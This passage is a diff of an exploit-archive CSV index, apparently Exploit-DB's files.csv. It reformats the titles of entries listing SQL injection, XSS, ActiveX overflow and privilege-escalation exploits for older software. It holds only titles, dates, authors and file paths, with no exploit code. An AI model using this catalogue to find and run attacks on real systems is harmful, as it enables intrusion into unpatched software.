Vulnerability",2007-05-10,the_Edit0r,php,webapps,0 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0 30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow Vulnerability",2007-05-11,"Victor Stinner",linux,dos,0 @@ -27072,8 +27072,8 @@ id,file,description,date,author,platform,type,port 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0 30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 User ID Key Spoofing Vulnerability",2007-06-11,nnposter,windows,remote,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 -30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 -30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 auth.php user Parameter XSS",2007-06-11,"Tim Brown",php,webapps,0 +30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 +30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - auth.php user Parameter XSS",2007-06-11,"Tim Brown",php,webapps,0 30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 BB-Login.PHP Cross-Site Scripting Vulnerability",2007-06-11,"Ory Segal",php,webapps,0 @@ -27094,7 +27094,7 @@ id,file,description,date,author,platform,type,port 30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Include Vulnerability",2007-06-18,maiosyet,cgi,webapps,0 30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-08-18,Serapis.net,php,webapps,0 30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 Low.PHP Cross-Site Scripting Vulnerability",2007-06-18,RMx,php,webapps,0 -30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 AuthError.CFM SQL Injection Vulnerability",2007-06-19,"Ivan Almuina",cfm,webapps,0 +30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - AuthError.CFM SQL Injection Vulnerability",2007-06-19,"Ivan Almuina",cfm,webapps,0 30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 comersus_customerAuthenticateForm.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart comersus_message.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 @@ -27107,7 +27107,7 @@ id,file,description,date,author,platform,type,port 30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 -30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 +30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0 30219,platforms/multiple/remote/30219.txt,"MyServer 0.8.9 Filename Parse Error Information Disclosure Vulnerability",2007-06-21,"Shay Priel",multiple,remote,0 @@ -27121,7 +27121,7 @@ id,file,description,date,author,platform,type,port 30227,platforms/php/webapps/30227.txt,"Joomla/Mambo Mod_Forum Component PHPBB_Root.PHP Remote File Include Vulnerability",2007-06-22,spymeta,php,webapps,0 30228,platforms/osx/remote/30228.txt,"Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability",2007-06-22,"Richard Moore",osx,remote,0 30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 Filename Parse Error Information Disclosure Vulnerability",2007-06-25,"Shay Priel",multiple,remote,0 -30230,platforms/php/webapps/30230.txt,"MyNews 0.10 AuthACC SQL Injection Vulnerability",2007-06-25,netVigilance,php,webapps,0 +30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection Vulnerability",2007-06-25,netVigilance,php,webapps,0 30231,platforms/multiple/remote/30231.txt,"Key Focus Web Server 3.1 Index.WKF Cross-Site Scripting Vulnerability",2007-06-25,"Shay Priel",multiple,remote,0 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0 @@ -27240,7 +27240,7 @@ id,file,description,date,author,platform,type,port 30388,platforms/php/webapps/30388.txt,"Vikingboard Viking board 0.1.2 cp.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 Index.PHP Directory Traversal Vulnerability",2007-07-25,Lostmon,php,webapps,0 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 UserName Parameter SQL Injection Vulnerability",2007-07-26,"Aria-Security Team",php,webapps,0 -30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 Authorize.PHP Remote File Include Vulnerability",2007-07-26,S4M3K,php,webapps,0 +30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.PHP Remote File Include Vulnerability",2007-07-26,S4M3K,php,webapps,0 30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,metasploit,windows,local,0 30393,platforms/win64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation",2013-12-17,metasploit,win64,local,0 30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use After Free",2013-12-17,metasploit,windows,remote,0 @@ -27577,7 +27577,7 @@ id,file,description,date,author,platform,type,port 30753,platforms/php/webapps/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,webapps,0 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 PHP_SELF Index.PHP Cross-Site Scripting Vulnerability",2007-08-27,L4teral,php,webapps,0 30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-12,"Jan Fry",hardware,remote,0 -30756,platforms/windows/remote/30756.html,"Microsoft Forms 2.0 ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,remote,0 +30756,platforms/windows/remote/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,remote,0 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 sources/frame.php room Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 upgradev1.php INSTALL_X7CHATVERSION Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting Vulnerability",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 @@ -27593,7 +27593,7 @@ id,file,description,date,author,platform,type,port 30769,platforms/php/webapps/30769.txt,"Nuked-Klan 1.7.5 File Parameter News Module Cross-Site Scripting Vulnerability",2007-11-15,Bl@ckM@mba,php,webapps,0 30770,platforms/cgi/webapps/30770.txt,"AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0 30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller Screens Directory HTML Injection Vulnerability",2007-11-15,"Jan Fry",multiple,remote,0 -30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 +30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow Vulnerability",2007-11-16,cocoruder,windows,dos,0 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script Cross-Site Scripting Vulnerability",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 Login.ASP Multiple SQL Injection Vulnerabilities",2007-11-17,"Aria-Security Team",asp,webapps,0 @@ -27615,7 +27615,7 @@ id,file,description,date,author,platform,type,port 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0 30795,platforms/cgi/webapps/30795.txt,"GWExtranet Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0 30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 - Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0 -30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0 +30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x - ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0 30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 - Search.ASP SQL Injection Vulnerability",2007-11-22,"Aria-Security Team",asp,webapps,0 30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator Index.PHP HTML Injection Vulnerability",2007-11-22,Doz,php,webapps,0 30800,platforms/asp/webapps/30800.html,"FooSun Api_Response.ASP SQL Injection Vulnerability",2007-11-23,flyh4t,asp,webapps,0 @@ -27623,7 +27623,7 @@ id,file,description,date,author,platform,type,port 30802,platforms/windows/local/30802.c,"VMware Tools 3.1 HGFS.Sys Local Privilege Escalation Vulnerability",2007-11-24,SoBeIt,windows,local,0 30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 Login SQL Injection Vulnerability",2007-11-24,"Aria-Security Team",php,webapps,0 30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting Vulnerability",2007-11-24,Crackers_Child,php,webapps,0 -30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 +30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting Vulnerability",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty Password Parameters SQL Injection Vulnerability",2007-11-26,"Aria-Security Team",asp,webapps,0 30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 Scp.DLL Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 @@ -27813,7 +27813,7 @@ id,file,description,date,author,platform,type,port 31000,platforms/php/webapps/31000.txt,"SysHotel On Line System 'index.php' Local File Include Vulnerability",2008-01-08,p4imi0,php,webapps,0 31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - 'admin/index.html' Cross-Site Scripting Vulnerability",2008-01-08,Ekin0x,php,webapps,0 31002,platforms/linux/dos/31002.txt,"xine-lib <= 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow Vulnerability",2008-01-09,"Luigi Auriemma",linux,dos,0 -31003,platforms/php/webapps/31003.txt,"Omegasoft Insel 7 Authentication Bypass Vulnerability and User Enumeration Weakness",2008-01-09,MC.Iglo,php,webapps,0 +31003,platforms/php/webapps/31003.txt,"Omegasoft Insel 7 - Authentication Bypass Vulnerability and User Enumeration Weakness",2008-01-09,MC.Iglo,php,webapps,0 31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/login.jsp Multiple Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/account/findForSelect.jsp resultsForm Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/help/index.jsp helpUrl Variable Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 @@ -27847,13 +27847,13 @@ id,file,description,date,author,platform,type,port 31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0 31039,platforms/windows/remote/31039.txt,"BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability",2008-01-19,"Oliver Karow",windows,remote,0 -31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 ActiveX Control Buffer Overflow Vulnerabilities",2008-01-20,rgod,windows,remote,0 +31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 - ActiveX Control Buffer Overflow Vulnerabilities",2008-01-20,rgod,windows,remote,0 31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b 'upload.asp' Cross-Site Scripting Vulnerability",2008-01-21,Doz,asp,webapps,0 31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router Cross-Site Request Forgery Vulnerability",2008-01-21,WarGame,cgi,webapps,0 31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template 'gallery' Parameter Cross-Site Scripting Vulnerability",2008-01-21,trew,php,webapps,0 31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Parameter Remote File Include Vulnerability",2008-01-21,anonymous,php,webapps,0 -31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 ActiveX Control 'ChatRoom()' Buffer Overflow Vulnerability",2008-01-09,Knell,windows,remote,0 +31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Buffer Overflow Vulnerability",2008-01-09,Knell,windows,remote,0 31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting Vulnerability",2008-01-22,"Jan Fry",multiple,remote,0 31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-01-22,RawSecurity.org,php,webapps,0 31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 - 'attachments_header.php' Cross-Site Scripting Vulnerability",2008-01-22,NBBN,php,webapps,0 @@ -27976,7 +27976,7 @@ id,file,description,date,author,platform,type,port 31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS Vulnerabilities",2014-01-24,"High-Tech Bridge SA",php,webapps,80 31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php, id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 -31177,platforms/windows/dos/31177.html,"MW6 Technologies DataMatrix ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 +31177,platforms/windows/dos/31177.html,"MW6 Technologies DataMatrix - ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0 31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001 @@ -28353,7 +28353,7 @@ id,file,description,date,author,platform,type,port 31571,platforms/php/webapps/31571.txt,"Wordpress Buddypress Plugin 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880 31574,platforms/arm/local/31574.c,"Linux Kernel - Local Root Exploit (ARM)",2014-02-11,"Piotr Szerman",arm,local,0 -31575,platforms/windows/remote/31575.rb,"KingScada kxClientDownload.ocx ActiveX - Remote Code Execution",2014-02-11,metasploit,windows,remote,0 +31575,platforms/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,metasploit,windows,remote,0 31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,metasploit,windows,local,0 31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection and Remote Code Execution",2014-02-11,metasploit,unix,remote,7778 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection Vulnerability",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 @@ -28883,7 +28883,7 @@ id,file,description,date,author,platform,type,port 32121,platforms/php/webapps/32121.php,"Jamroom <= 3.3.8 Cookie Authentication Bypass Vulnerability and Multiple Unspecified Security Vulnerabilities",2008-07-28,"James Bercegay",php,webapps,0 32122,platforms/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting Vulnerability",2008-07-28,"Fabian Fingerle",php,webapps,0 32123,platforms/php/webapps/32123.txt,"miniBB RSS 2.0 Plugin Multiple Remote File Include Vulnerabilities",2008-07-29,"Ghost Hacker",php,webapps,0 -32124,platforms/windows/remote/32124.txt,"Eyeball MessengerSDK 'CoVideoWindow.ocx' 5.0.907 ActiveX Control Remote Buffer Overflow Vulnerability",2008-07-29,"Edi Strosar",windows,remote,0 +32124,platforms/windows/remote/32124.txt,"Eyeball MessengerSDK 'CoVideoWindow.ocx' 5.0.907 - ActiveX Control Remote Buffer Overflow Vulnerability",2008-07-29,"Edi Strosar",windows,remote,0 32125,platforms/multiple/dos/32125.txt,"Unreal Tournament 2004 - NULL Pointer Remote Denial of Service Vulnerability",2008-07-30,"Luigi Auriemma",multiple,dos,0 32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection Vulnerability",2008-05-11,Portcullis,php,webapps,0 32127,platforms/multiple/dos/32127.txt,"Unreal Tournament 3 - Denial Of Service And Memory Corruption Vulnerabilities",2008-07-30,"Luigi Auriemma",multiple,dos,0 @@ -29046,7 +29046,7 @@ id,file,description,date,author,platform,type,port 32291,platforms/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 - Search Cross-Site Scripting Vulnerability",2008-08-22,"Tyler Trioxide",php,webapps,0 32292,platforms/linux/dos/32292.rb,"Ruby <= 1.9 REXML Remote Denial Of Service Vulnerability",2008-08-23,"Luka Treiber",linux,dos,0 32293,platforms/php/webapps/32293.txt,"One-News Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 -32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 ActiveX Control Remote Buffer Overflow Vulnerability",2008-08-22,"Jeremy Brown",windows,dos,0 +32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow Vulnerability",2008-08-22,"Jeremy Brown",windows,dos,0 32295,platforms/php/webapps/32295.txt,"PHP-Ultimate Webboard 2.0 - 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps,0 32296,platforms/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,php,webapps,0 32297,platforms/asp/webapps/32297.txt,"Smart Survey 1.0 - 'surveyresults.asp' Cross-Site Scripting Vulnerability",2008-08-26,"Bug Researchers Group",asp,webapps,0 @@ -29172,7 +29172,7 @@ id,file,description,date,author,platform,type,port 32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 - Remote Stack Buffer Overflow Vulnerability",2008-09-26,"Ruben Santamarta ",windows,remote,0 32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Include Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0 32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 HTTP Proxy Remote Denial of Service Vulnerability",2008-09-26,quakerdoomer,windows,dos,0 -32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 ActiveX Control 'CanUninstall()' Buffer Overflow Vulnerability",2008-09-27,Satan_HackerS,windows,remote,0 +32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 - ActiveX Control 'CanUninstall()' Buffer Overflow Vulnerability",2008-09-27,Satan_HackerS,windows,remote,0 32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",cgi,webapps,0 32431,platforms/php/webapps/32431.txt,"Lyrics Script 'search_results.php' Cross-Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0 32432,platforms/php/webapps/32432.txt,"Clickbank Portal 'search.php' Cross-Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0 @@ -29230,7 +29230,7 @@ id,file,description,date,author,platform,type,port 32488,platforms/php/webapps/32488.txt,"Elxis CMS 2008.1 PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps,0 32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' URI Redirection Vulnerability",2008-10-15,"Martin Suess",windows,remote,0 32490,platforms/php/webapps/32490.txt,"SweetCMS 1.5.2 - 'index.php' SQL Injection Vulnerability",2008-10-14,Dapirates,php,webapps,0 -32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 ActiveX Control 'PlainTextPassword()' Buffer Overflow Vulnerability",2008-10-16,"Thomas Pollet",windows,remote,0 +32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Buffer Overflow Vulnerability",2008-10-16,"Thomas Pollet",windows,remote,0 32492,platforms/php/webapps/32492.txt,"Habari 0.5.1 - 'habari_username' Parameter Cross-Site Scripting Vulnerability",2008-10-16,faithlove,php,webapps,0 32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0 32494,platforms/php/webapps/32494.txt,"FlashChat 'connection.php' Role Filter Security Bypass Vulnerability",2008-10-17,eLiSiA,php,webapps,0 @@ -29382,7 +29382,7 @@ id,file,description,date,author,platform,type,port 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 SQL Injection and Cross-Site Scripting Vulnerabilities",2008-12-04,Pouya_Server,php,webapps,0 32642,platforms/php/webapps/32642.txt,"PHPSTREET Webboard 1.0 - 'show.php' SQL Injection Vulnerability",2008-12-04,"CWH Underground",php,webapps,0 32643,platforms/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",windows,remote,5060 -32644,platforms/php/webapps/32644.txt,"AlienVault 4.5.0 Authenticated SQL Injection",2014-04-01,"Brandon Perry",php,webapps,443 +32644,platforms/php/webapps/32644.txt,"AlienVault 4.5.0 - Authenticated SQL Injection",2014-04-01,"Brandon Perry",php,webapps,443 32645,platforms/php/webapps/32645.txt,"TWiki 4.x SEARCH Variable Remote Command Execution Vulnerability",2008-12-06,"Troy Bollinge",php,webapps,0 32646,platforms/php/webapps/32646.txt,"TWiki 4.x URLPARAM Variable Cross-Site Scripting Vulnerability",2008-12-06,"Marc Schoenefeld",php,webapps,0 32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 admin/login.php PATH_INFO Parameter XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0 @@ -29888,8 +29888,8 @@ id,file,description,date,author,platform,type,port 33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting Vulnerability",2009-08-19,"Adam Bixby",multiple,webapps,0 33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder Unicode Cross-Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0 33182,platforms/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service Vulnerability",2009-08-23,"Luigi Auriemma",multiple,dos,0 -33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (1)",2009-08-25,"Francis Provencher",novell,dos,0 -33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (2)",2009-08-25,"Francis Provencher",novell,dos,0 +33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (1)",2009-08-25,"Francis Provencher",novell,dos,0 +33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (2)",2009-08-25,"Francis Provencher",novell,dos,0 33185,platforms/windows/dos/33185.html,"Nokia Lotus Notes Connector 'lnresobject.dll' Unspecified Remote Denial of Service Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0 33186,platforms/php/webapps/33186.txt,"VideoGirls forum.php t Parameter XSS",2009-08-26,Moudi,php,webapps,0 33187,platforms/php/webapps/33187.txt,"VideoGirls profile.php profile_name Parameter XSS",2009-08-26,Moudi,php,webapps,0 @@ -29910,9 +29910,9 @@ id,file,description,date,author,platform,type,port 33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Parameter Remote File Include Vulnerability",2009-09-09,"Beenu Arora",php,webapps,0 33205,platforms/windows/dos/33205.pl,"Nokia Multimedia Player 1.1 - Remote Denial of Service Vulnerability",2009-09-01,"opt!x hacker",windows,dos,0 33206,platforms/php/webapps/33206.txt,"MKPortal 1.x - Multiple Modules Cross-Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 -33207,platforms/windows/remote/33207.txt,"SmartVMD 1.3 ActiveX Control 'VideoMovementDetection.dll' Buffer Overflow Vulnerability",2009-09-01,"optix hacker",windows,remote,0 +33207,platforms/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Buffer Overflow Vulnerability",2009-09-01,"optix hacker",windows,remote,0 33208,platforms/php/webapps/33208.txt,"MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 -33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 Authentication Bypass Vulnerability",2009-09-03,Intevydis,jsp,webapps,0 +33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 - Authentication Bypass Vulnerability",2009-09-03,Intevydis,jsp,webapps,0 33210,platforms/multiple/remote/33210.txt,"HP Operations Manager Default Manager 8.1 Account Remote Security 